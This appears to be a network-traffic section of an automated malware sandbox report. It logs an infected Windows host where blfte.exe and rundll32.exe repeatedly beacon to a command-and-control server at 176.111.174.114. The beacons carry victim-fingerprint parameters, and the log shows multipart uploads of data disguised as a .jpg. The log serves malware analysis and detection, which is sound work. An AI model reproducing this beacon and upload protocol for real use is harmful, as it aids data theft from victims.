                                                                                                                                          Apr 28, 2021 22:59:35.161876917 CEST | 4847 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Ascii: --152138533219.jpg
                                                                                                                                          Content-Disposition: form-data; name="data"; filename="152138533219.jpg"
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Data Ascii: b}TQ{Jq<=kX+0u?{{^-_3o>K"tvN,ss_'m;(E{5xqNq_Wx"n+7d%#&1RWINNft]x?Xvb:)W^zjsKCjr
                                                                                                                                          Apr 28, 2021 22:59:35.359040976 CEST4902OUTData Raw: 27 6a 0a e6 64 6f 01 ef 55 de 10 4e 3a 55 ea 64 8a 0b 73 51 ca 5c 64 72 db b6 f3 9a fd 31 ff 00 83 51 ae c4 5f f0 53 ad 4d ca b1 1f f0 aa 35 8f 95 17 24 e2 e2 c8 e0 0e e7 8a fc ce af 69 fd 83 ff 00 6f 0f 8d bf f0 4e cf 8d 77 1f 1f 3e 00 d9 e8 53
                                                                                                                                          Data Ascii: 'jdoUN:UdsQ\dr1Q_SM5$ioNw>Sk390D"|P$a#:ppUaC3qOaM|)|_u+"mTyhXwr$)@%j]6+/oqo!G# 9o(?Ko
                                                                                                                                          Apr 28, 2021 22:59:35.359241009 CEST4910OUTData Raw: 9b 25 a6 ff 00 90 0a bc b6 f8 a5 f2 3d e8 f6 42 f6 cc cc 93 4b dd f2 54 32 68 e1 ba 25 6d 79 07 fb b4 e5 b4 ec 12 a7 d8 d2 1a c5 4e 27 35 36 89 c6 70 2a 9d c6 85 f2 1c 57 65 f6 1f fa 67 51 cb a5 ef 3f 72 b9 a5 81 84 8d a9 e6 12 89 e7 f7 5e 1f 73
                                                                                                                                          Data Ascii: %=BKT2h%myN'56p*WegQ?r^sqzMVu+W07lYz&^y9J~J\gDKBu-?Yueg`cn,|\Wox|wa^_=39i-?{V"Igb


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
148 | 176.111.174.114 | 80 | 192.168.2.4 | 49823 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.231545925 CEST | 4847 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
149 | 192.168.2.4 | 49826 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.440059900 CEST | 4935 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 176.111.174.114 | 80 | 192.168.2.4 | 49755 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:11.577802896 CEST | 4528 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
150 | 176.111.174.114 | 80 | 192.168.2.4 | 49826 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.538959980 CEST | 5061 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
151 | 176.111.174.114 | 80 | 192.168.2.4 | 49824 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.655622005 CEST | 5124 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
152 | 192.168.2.4 | 49827 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.749243975 CEST | 5125 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
153 | 176.111.174.114 | 80 | 192.168.2.4 | 49827 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:35.847718000 CEST | 5125 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
154 | 192.168.2.4 | 49830 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.063796997 CEST | 5133 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
155 | 176.111.174.114 | 80 | 192.168.2.4 | 49830 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.164963007 CEST | 5134 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
156 | 192.168.2.4 | 49831 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.380536079 CEST | 5213 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
157 | 176.111.174.114 | 80 | 192.168.2.4 | 49831 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.479239941 CEST | 5214 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
158 | 192.168.2.4 | 49833 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.694013119 CEST | 5221 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
159 | 176.111.174.114 | 80 | 192.168.2.4 | 49833 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:36.801321983 CEST | 5229 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.4 | 49756 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:11.785012007 CEST | 4529 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          160 | 192.168.2.4 | 49835 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.022660971 CEST | 5256 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          161 | 176.111.174.114 | 80 | 192.168.2.4 | 49835 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.125809908 CEST | 5258 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          162 | 192.168.2.4 | 49838 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.331136942 CEST | 5268 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          163 | 176.111.174.114 | 80 | 192.168.2.4 | 49838 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.437372923 CEST | 5288 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          164 | 192.168.2.4 | 49839 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.655920029 CEST | 5331 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          165 | 176.111.174.114 | 80 | 192.168.2.4 | 49839 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.772948980 CEST | 5332 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          166 | 192.168.2.4 | 49841 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:37.989100933 CEST | 5341 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          167 | 176.111.174.114 | 80 | 192.168.2.4 | 49841 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.093897104 CEST | 5343 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          168 | 192.168.2.4 | 49842 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.300671101 CEST | 5421 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          169 | 176.111.174.114 | 80 | 192.168.2.4 | 49842 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.398679972 CEST | 5422 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          17 | 176.111.174.114 | 80 | 192.168.2.4 | 49756 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:11.890094995 CEST | 4529 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          170 | 192.168.2.4 | 49843 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.462100029 CEST | 5436 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Ascii: --152138533219.jpg
                                                                                                                                          Content-Disposition: form-data; name="data"; filename="152138533219.jpg"
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Apr 28, 2021 22:59:38.558820009 CEST5443OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:38.559484005 CEST5449OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:38.559973001 CEST5454OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:38.560167074 CEST5457OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:38.560291052 CEST5459OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
